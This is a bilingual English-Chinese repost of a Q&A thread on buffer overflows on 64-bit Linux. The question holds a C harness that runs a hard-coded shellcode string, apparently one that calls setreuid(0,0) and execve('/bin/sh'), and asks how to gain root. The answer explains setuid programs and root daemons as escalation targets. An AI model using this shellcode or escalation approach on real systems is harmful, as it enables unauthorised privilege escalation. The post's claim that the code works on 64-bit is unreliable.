64位Linux上的缓冲区溢出
[英]Buffer overflows on 64 Bit Linux
问题描述
I have been playing around with buffer overflows for fun. 
我一直在玩缓冲器溢出的游戏。 I have been able to run some simple exploits. 我已经能够进行一些简单的攻击。 I have been doing this by using a "C" code that casts a character string containing the shell code to a function pointer. 我一直在使用“ C”代码来执行此操作,该代码将包含外壳程序代码的字符串转换为函数指针。 Doing this is quite interesting for me, for instance I have never assumed that a function pointer, can allow the user to execute code, which is not even hard coded in the source. 这样做对我来说很有趣,例如,我从未假设过函数指针可以允许用户执行代码,甚至在源代码中也没有进行硬编码。 For a simple example see below: 对于一个简单的示例,请参见以下内容:
#include <unistd.h>
char code[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"
"\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"
"\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42";
int main(int argc, char **argv)
{
/*creating a function pointer*/
char (*func)();
func = (char (*)()) code;
func();
}
This small piece of code will spawn a shell on a 64 bit Linux. 这小段代码将在64位Linux上生成shell。 The question is: Is it possible to get root permissions using a shell script. 问题是:是否可以使用Shell脚本获得root权限。 This would be quite fun to try. 尝试这将很有趣。 I have found some shell scripts on the internet that claim to be able to do this, however, they produce only seg. 我在互联网上找到了一些声称可以执行此操作的Shell脚本,但是它们仅生成段。 faults when I try running them. 我尝试运行它们时出现故障。 I would be grateful if someone can give me any hints, whether this is at all possible. 如果有人可以给我任何提示,无论是否有可能,我将不胜感激。 I would also appreciate any interesting shell scripts to play with. 我还要感谢任何有趣的shell脚本。
Cheers. 干杯。
1 个解决方案
解决方案1
0 已采纳 2014-05-01 15:42:07
With just a regular buffer overflow the shell code can't do anything the original program can't, you would need an actual kernel exploit for that. 仅有常规的缓冲区溢出,shell代码无法执行原始程序无法执行的任何操作,因此您需要实际的内核利用。
You usually get root shells when you have programs that run as root, either because they have the +s flag (set uid) or because they are daemons that take userinput from somewhere outside the system. 当您拥有以root身份运行的程序时,通常会得到root shell,这是因为它们具有+ s标志 (设置uid)或因为它们是从系统外部某处获取用户输入的守护程序。
Setuid-programs are programs that run as a different user than you launch them as. Setuid程序是与您启动时不同的用户身份运行的程序。 Take su for example, it is owned by root and has +s set, therefore it runs as root no matter who starts it. 以su为例,它由root拥有并设置了+ s,因此无论谁启动它都以root身份运行。 The program then tries to confirm that you are allowed to escalate privileges and spawns a shell for the user you requested. 然后,程序尝试确认是否允许您升级特权,并为您请求的用户生成一个shell。 If there was buffer overflow vulnerability in su and you were to put a regular /bin/sh payload in it, you would end up with a root shell. 如果su存在缓冲区溢出漏洞,而您要在其中放入常规的/bin/sh有效负载,则最终将获得root shell。
A daemon could be for example a webinterface that runs as root in order to do something (maybe it can shut down the pc). 守护程序可以是例如以root用户身份运行以进行某些操作的Web界面(也许可以关闭PC)。 If it had a vulnerability that you could access from outside the computer, like a buffer overflow in the HTTP headers, you would again be able to spawn a root shell. 如果它具有可以从计算机外部访问的漏洞,例如HTTP标头中的缓冲区溢出,则可以再次生成根shell。
The shells you saw probably made use of the setuid() C function (or similar ones), which can do the same thing as +s if the process is privileged enough . 您看到的shell可能使用了setuid() C函数(或类似的函数), 如果进程具有足够的特权,则该函数可以与+ s相同。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.